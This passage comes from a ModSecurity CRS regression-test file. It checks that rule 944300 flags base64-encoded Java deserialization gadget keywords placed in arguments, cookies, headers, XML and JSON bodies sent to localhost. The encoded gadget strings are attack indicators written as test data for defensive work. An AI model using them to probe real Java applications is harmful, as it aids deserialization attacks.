Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-65 - desc: "Content-Type application/json arg name includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-66 - desc: "Argument test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-67 - desc: "Argument name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-68 - desc: "Cookie test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-69 - desc: "Cookie name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-70 - desc: "Request header test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Y2xvbmV0cmFuc2Zvcm1lcg - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-71 - desc: "XML attribute value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-72 - desc: "XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-73 - desc: "Nested XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-74 - desc: "Content-Type text/plain includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-75 - desc: "Content-Type application/json arg value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-76 - desc: "Content-Type application/json arg name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-77 - desc: "Argument test includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-78 - desc: "Argument name includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-79 - desc: "Cookie test includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=GNsb25ldHJhbnNmb3JtZXI - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-80 - desc: "Cookie name includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: GNsb25ldHJhbnNmb3JtZXI=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-81 - desc: "Request header test includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: GNsb25ldHJhbnNmb3JtZXI - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-82 - desc: "XML attribute value includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-83 - desc: "XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-84 - desc: "Nested XML element value includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-85 - desc: "Content-Type text/plain includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=GNsb25ldHJhbnNmb3JtZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-86 - desc: "Content-Type application/json arg value includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-87 - desc: "Content-Type application/json arg name includes keyword GNsb25ldHJhbnNmb3JtZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-88 - desc: "Argument test includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-89 - desc: "Argument name includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-90 - desc: "Cookie test includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BjbG9uZXRyYW5zZm9ybWVy - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-91 - desc: "Cookie name includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BjbG9uZXRyYW5zZm9ybWVy=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-92 - desc: "Request header test includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BjbG9uZXRyYW5zZm9ybWVy - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-93 - desc: "XML attribute value includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-94 - desc: "XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-95 - desc: "Nested XML element value includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-96 - desc: "Content-Type text/plain includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=BjbG9uZXRyYW5zZm9ybWVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-97 - desc: "Content-Type application/json arg value includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-98 - desc: "Content-Type application/json arg name includes keyword BjbG9uZXRyYW5zZm9ybWVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-99 - desc: "Argument test includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-100 - desc: "Argument name includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-101 - desc: "Cookie test includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Zm9yY2xvc3VyZQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-102 - desc: "Cookie name includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Zm9yY2xvc3VyZQ=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-103 - desc: "Request header test includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Zm9yY2xvc3VyZQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-104 - desc: "XML attribute value includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-105 - desc: "XML element value includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-106 - desc: "Nested XML element value includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Zm9yY2xvc3VyZQ" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-107 - desc: "Content-Type text/plain includes keyword Zm9yY2xvc3VyZQ" - stages: - - - stage: - input: - dest_addr: 